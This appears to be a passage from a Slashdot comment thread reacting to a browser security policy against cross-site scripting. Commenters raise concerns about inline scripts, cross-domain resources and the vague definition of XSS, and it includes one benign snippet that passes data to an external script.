How would you pass parameters to scripts? How would you do AJAX or DHTML stuff based on realtime data? I suppose you could wrap everything in semantic classes and data attributes containing JSON, hell, even JavaScript, and then include an external script that evals them all. Inline scripting through the back door. Is that what they want us to do? Or have an extra JavaScript file with every HTML file?
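The data-attribute workaround the poster describes would look something like this (all names hypothetical): the page carries only markup and data, and one external file, loadable under the policy, reads the parameters back out:

<ecode>
<!-- in the HTML: data, but no code -->
<div id="chart" data-points="[3,1,4,1,5]"></div>
<script src="/js/chart.js"></script>

// in chart.js:
var el = document.getElementById("chart");
var points = JSON.parse(el.getAttribute("data-points"));
</ecode>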

Umm... (0)

Anonymous Coward | more than 4 years ago | (#28522851)

Why would anyone run cross site scripts *now*, except in clearly white-hat uses?

PLEASE GOD NOOO! ;) (1, Informative)

Hurricane78 (562437) | more than 4 years ago | (#28522935)

Please don't let this become the same horror that it is with plugins.

If you've ever tried to add an applet or anything embedded into a site that came from some other domain (like an MP3 stream), you will know what I am talking about. It just gets blocked, unless you have a signed certificate and other shit that you can only get for money. And then it is still a huge mess to set up.

In my eyes this stifled web technology quite a bit.

Additionally, what do you do when you yourself have several domains and subdomains? Like a global domain for common things, like the base stylesheet and script libs, and local domains that use them. Etc.

It's good to make this safe. But it absolutely must be done right. Or else, there will be a giant mess. :/

XSS (Cross-Site Scripting) definition? (1)

jc42 (318812) | more than 4 years ago | (#28523735)

So is there an official definition of "Cross-Site Scripting" somewhere? Since that phrase started to be used in scary security stories a few years ago, I've been collecting the definitions that various stories provide, and I've been a bit disappointed. Mostly, they aren't even "definitions", in the usual dictionary sense of the term. I.e., I can't use most of the purported "definitions" to decide whether what I'm looking at is an instance of the phrase. And in general, no two stories or sites seem to use similar definitions (when they actually give definitions at all).

My impression is that "Cross-Site Scripting" is an empty scare phrase that really just means "anything involving two different machines and a script -- whatever that may be".

So has some official organization defined the phrase? If so, what makes them an authority? And is there some way that I can tell when someone is using the official definition (if such exists), or should I just continue to view the phrase as an attempt to scare readers without actually informing them about the problem?

I note that the definition associated with TFA isn't actually a definition. And several other postings here have linked to sites that also give ambiguous non-definition definitions.

It sure seems there's something being talked about here, but it seems to suffer from the usual problem with security authorities: they view me as an idiot who doesn't need to be informed about the subject matter; I only need to be scared (presumably so that I'll pay them to fix something that they've carefully made sure I can't understand clearly).

I'd think that security is an area where you'd want to be careful with your definitions and terminology. But apparently I'm wrong.

But I want and need X-site scripting! (1)

kanweg (771128) | more than 4 years ago | (#28523797)

I'm a bit out of my league knowledge-wise here, but at my company I have a web application that would benefit very much from being able to do something in the window of another site. Why can't a browser (not the web app) be set to very specifically allow a particular web application to make use of another specified website? E.g., that would allow me to fill out a form with data from the web app, or vice versa, to get data into my MySQL database without having to enter it manually, which is error-prone. Because it is a browser setting where both domains are set to specifically interact with each other, I don't see how it could be used to do anything malicious, but it would help web apps enormously.

Bert
